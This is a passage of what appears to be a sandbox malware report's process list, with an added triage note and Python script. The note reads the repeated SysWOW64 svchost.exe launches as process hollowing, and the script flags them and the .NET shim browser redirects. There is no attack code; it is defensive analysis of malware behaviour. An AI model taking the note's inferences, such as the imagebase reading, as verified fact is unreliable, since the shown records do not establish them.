                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                            Start time:12:44:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                            Start time:12:44:09
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                            Start time:12:44:14
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                            Start time:12:44:14
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                            Start time:12:44:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                            Start time:12:44:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:100
Start time:12:44:18
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:101
Start time:12:44:21
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:102
Start time:12:44:22
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:103
Start time:12:44:26
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:104
Start time:12:44:26
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:105
Start time:12:44:27
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:106
Start time:12:44:29
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:107
Start time:12:44:30
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:108
Start time:12:44:34
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:109
Start time:12:44:34
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:110
Start time:12:44:34
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:111
Start time:12:44:38
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                            Start time:12:44:38
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                            Start time:12:44:42
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                            Start time:12:44:43
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                            Start time:12:44:43
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                            Start time:12:44:45
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                            Start time:12:44:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                            Start time:12:44:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

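Triage note on the records above (an added check, not part of the Joe Sandbox report): two patterns repeat in this stretch of the process list. First, svchost.exe is started from C:\Windows\SysWOW64 as a 32-bit process with the bare command line "svchost.exe"; a legitimate service host runs from System32, is started by services.exe, and carries a "-k <group>" service-group argument, so this is the hollowed host the "Injects a PE file into a foreign processes" signature refers to. Second, each such svchost.exe is followed within seconds by a chrome.exe whose only argument is a go.microsoft.com fwlink with o1=SHIM_NOVERSION_FOUND. That link is the one the .NET Framework startup shim opens in the default browser when a managed image requests a framework version it cannot find, and its processName field names the process that hosted the managed image, here svchost.exe. The Python script below, written for this page and not taken from the report, parses records in this "Key:value" layout and flags both patterns; its sample input is Target IDs 114 through 116 copied from the listing with the indentation removed.

```python
"""Flag anomalous process records in a Joe Sandbox 'Target ID' listing."""
import ntpath
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample: Target IDs 114-116 from the listing above, indentation stripped.
SAMPLE = r"""
Target ID:114
Start time:12:44:43
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 /prefetch:8
Imagebase:0x7ff76e190000
Has exited:true

Target ID:115
Start time:12:44:43
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has exited:true

Target ID:116
Start time:12:44:45
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
Has exited:true
"""

SYSTEM32 = r"c:\windows\system32"


def parse_records(text):
    """Split the listing on blank lines; each 'Key:value' line becomes a dict entry.
    Splitting on the first colon keeps values such as '12:44:43' and 'C:\\...' intact."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            line = line.strip()
            if ":" not in line:
                continue
            key, value = line.split(":", 1)
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def svchost_findings(rec):
    """Heuristics for a service host that was not started the way services.exe starts it."""
    path = rec.get("Path", "")
    cmd = rec.get("Commandline", "")
    if ntpath.basename(path).lower() != "svchost.exe":
        return []
    findings = []
    if ntpath.dirname(path).lower() != SYSTEM32:
        findings.append(f"svchost.exe loaded from {ntpath.dirname(path)} instead of System32")
    if not re.search(r"(^|\s)-k\s+\S+", cmd):
        findings.append(f"no '-k <group>' service-group argument in command line: {cmd!r}")
    return findings


def dotnet_shim_findings(rec):
    """Detect the .NET shim's 'framework not found' browser redirect and pull out
    the process that hosted the managed image and the framework version it asked for."""
    m = re.search(r"https?://go\.microsoft\.com/fwlink/\?\S+", rec.get("Commandline", ""))
    if not m:
        return None
    qs = parse_qs(urlparse(m.group(0)).query)
    if qs.get("o1", [""])[0] != "SHIM_NOVERSION_FOUND":
        return None
    return {
        "host_process": qs.get("processName", [""])[0],
        "requested_version": qs.get("pver", [""])[0],
        "shim_version": qs.get("shimver", [""])[0],
    }


def triage(text):
    """Return {Target ID: [finding, ...]} for every record that trips a heuristic."""
    hits = {}
    for rec in parse_records(text):
        findings = svchost_findings(rec)
        shim = dotnet_shim_findings(rec)
        if shim:
            findings.append(
                f".NET shim redirect: managed image in {shim['host_process']} "
                f"requested framework {shim['requested_version']} (shim {shim['shim_version']})"
            )
        if findings:
            hits[rec.get("Target ID", "?")] = findings
    return hits


if __name__ == "__main__":
    for target, findings in triage(SAMPLE).items():
        for f in findings:
            print(f"Target {target}: {f}")
```

Run against the full listing, the script pairs every SysWOW64 svchost.exe record with the chrome.exe launch that follows it, which is the sequence a host-based rule would key on: a service host with no "-k" group, followed by the default browser opening a Microsoft download link on the host's behalf. The imagebase of 0x60000 on the svchost records is a further oddity worth noting by hand; it is far lower than where an ASLR-enabled system binary normally lands, which is consistent with the on-disk image having been replaced in memory.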
                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                            Start time:12:44:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                            Start time:12:44:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
